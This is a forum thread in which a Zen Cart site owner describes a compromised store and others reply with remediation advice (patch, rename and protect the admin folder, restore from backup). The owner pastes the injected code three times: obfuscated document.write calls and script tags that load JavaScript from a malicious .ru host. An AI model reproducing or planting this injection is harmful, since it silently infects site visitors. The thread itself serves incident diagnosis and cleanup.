I just started noticing that my website has started to do some strange things. When I'm on the main page or any type of category the font is larger than normal and the bottom footer is laying over the Copyright and Powered by Zencart. Both the Footer links and the Header Links should be in that gold bar but it is tiny and they are not in the gold bar. It's only when I click on an individual product that the font returns to the size it was originally.

Also, when a page is loading at the bottom of the window in firefox it says, "Waiting for mysite.com," and then it says, "Connecting to timeanddate-com.megaporn.com.live-com.thetruehelp.ru..." Yesterday it was saying, "looking up nowdowloadall-com.fotolia.com.reference-com.airromax.ru..."

I don't know how this was added to my site but I want to know how I can remove it. Thank you.

I was able to remove him from the admin portion of the site but he is still in the public part.   index.php files altered, added index.html lots of altered .js files.

When I use my web developer tools and View Generated Source he is listed in three spots in the DOM Source of Selection.

1ST ONE
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head>

/*Exception*/ document.write('<script src='+'h!(t$&t(#!p(@!):&#/#@/()(t&(i$@m($e&&&@a$n!!d(!(d)@!a#^#t($#e$-$@c$((!o)m!.)!$(!m(e#@#g)@!a!@p#$(o$$^!r^^n$$(#.!c&^#o^&^m&@$.!^$&l)@^i&$v#e(!-)!#@c^$$o^&!^m@#.$t()!h@e)$t^##r@u(!e(&h)^e$@l!!(@)p#(.)r$#$u&(#(@@##8)$@0^)8(&^0(#@^/(@&(z&!$a^^!(^n^o!x^#$&-)(!(a#)(f&@f)$&$i##l@!i)(a!$t@e#$&.&&&&d^e&&/!z&&(a@$@&n)(o$)x!@!-!!#a^f@f(&i!!(l!^!$i#&a$$t(e@#.$d$(#e!@/$$@b#a&@d!&$)o!$&n))!g(&&o$&$#.#^$c&o)m#&/!@g@)@o(&^o&g&@(l&e!!(.@(#(&c!!^)o)$^m$$!/#^&$n)e&&x##@t$@!)a&^)^g^@.^$^@c@$@o!!m@(@/(('.replace(/\^|\(|@|#|\$|&|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script><script src="http://timeanddate-com.megaporn.com.live-com.thetruehelp.ru:8080/zanox-affiliate.de/zanox-affiliate.de/badongo.com/google.com/nextag.com/" defer="defer"></script>
<!--8bc2710541c78b0e84ca38227a6c774b-->


2ND ONE-LISTED JUST BELOW THE <link rel="stylesheet"
/*Exception*/ document.write('<script src='+'h!(t$&t(#!p(@!):&#/#@/()(t&(i$@m($e&&&@a$n!!d(!(d)@!a#^#t($#e$-$@c$((!o)m!.)!$(!m(e#@#g)@!a!@p#$(o$$^!r^^n$$(#.!c&^#o^&^m&@$.!^$&l)@^i&$v#e(!-)!#@c^$$o^&!^m@#.$t()!h@e)$t^##r@u(!e(&h)^e$@l!!(@)p#(.)r$#$u&(#(@@##8)$@0^)8(&^0(#@^/(@&(z&!$a^^!(^n^o!x^#$&-)(!(a#)(f&@f)$&$i##l@!i)(a!$t@e#$&.&&&&d^e&&/!z&&(a@$@&n)(o$)x!@!-!!#a^f@f(&i!!(l!^!$i#&a$$t(e@#.$d$(#e!@/$$@b#a&@d!&$)o!$&n))!g(&&o$&$#.#^$c&o)m#&/!@g@)@o(&^o&g&@(l&e!!(.@(#(&c!!^)o)$^m$$!/#^&$n)e&&x##@t$@!)a&^)^g^@.^$^@c@$@o!!m@(@/(('.replace(/\^|\(|@|#|\$|&|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script><script src="http://timeanddate-com.megaporn.com.live-com.thetruehelp.ru:8080/zanox-affiliate.de/zanox-affiliate.de/badongo.com/google.com/nextag.com/" defer="defer"></script>
<!--8bc2710541c78b0e84ca38227a6c774b--></head><body id="indexBody">

<div id="mainWrapper">



3RD ONE
<!-- bof: specials -->
<!-- eof: specials -->

</div>
/*Exception*/ document.write('<script src='+'h!(t$&t(#!p(@!):&#/#@/()(t&(i$@m($e&&&@a$n!!d(!(d)@!a#^#t($#e$-$@c$((!o)m!.)!$(!m(e#@#g)@!a!@p#$(o$$^!r^^n$$(#.!c&^#o^&^m&@$.!^$&l)@^i&$v#e(!-)!#@c^$$o^&!^m@#.$t()!h@e)$t^##r@u(!e(&h)^e$@l!!(@)p#(.)r$#$u&(#(@@##8)$@0^)8(&^0(#@^/(@&(z&!$a^^!(^n^o!x^#$&-)(!(a#)(f&@f)$&$i##l@!i)(a!$t@e#$&.&&&&d^e&&/!z&&(a@$@&n)(o$)x!@!-!!#a^f@f(&i!!(l!^!$i#&a$$t(e@#.$d$(#e!@/$$@b#a&@d!&$)o!$&n))!g(&&o$&$#.#^$c&o)m#&/!@g@)@o(&^o&g&@(l&e!!(.@(#(&c!!^)o)$^m$$!/#^&$n)e&&x##@t$@!)a&^)^g^@.^$^@c@$@o!!m@(@/(('.replace(/\^|\(|@|#|\$|&|\)|\!/ig, '')+' defer=defer></scr'+'ipt>');</script><script src="http://timeanddate-com.megaporn.com.live-com.thetruehelp.ru:8080/zanox-affiliate.de/zanox-affiliate.de/badongo.com/google.com/nextag.com/" defer="defer"></script>
<!--8bc2710541c78b0e84ca38227a6c774b-->
</td>

<td id="navColumnTwo" class="columnRight" style="width: 150px;">
__________________

The Zen Cart vulnerability is eerily similar to the one i posted regarding OSCommerce.

The steps are to apply a patch, rename the admin folder, and probably password protect the "renamed admin" folder.

See here for more details.
http://www.zen-cart.com/forum/showthread.php?t=130161

After you've done that you're probably going to need to reinstall Zen Cart, and possibly the rest of your site from a known good backup - because you can't possibly know all of the files which have been infected.

Unless you take some action it surely will.

Update all your scripts to the latest versions. The issue is due to a bug in your web application, not your FTP password or something else. These sorts of things are caused by someone exploiting your scripts and uploading content.

I had taken down my site with a maintenance.html which worked for a little while then it became a 500 Internal Server Error.  The site is now back up live and infected and I'm trying to get Lunarpages to take it down because my machine is still in the process of being cleaned.  Can't access FTP yet because I don't want to reinfect the server.  Solutions?